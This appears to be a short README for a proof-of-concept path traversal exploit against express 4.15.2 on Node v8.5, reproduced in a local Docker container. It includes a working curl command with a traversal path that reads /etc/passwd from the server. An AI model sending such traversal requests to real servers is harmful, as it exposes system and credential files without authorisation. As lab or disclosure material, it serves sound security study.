This exploit lets any user allowed to GET a static file from an express server running express-4.15.2 and node v8.5 read any file the user running the webserver has access to on the host system.
Conveniently express shipped an exploitable example in the source
- Docker
- Build the image:
docker build -t exploit . - Start the server:
docker run -p 3000:3000 exploit - curl with a malicious path:
curl --path-as-is 127.0.0.1:3000/../../../pivot/../../../../etc/passwd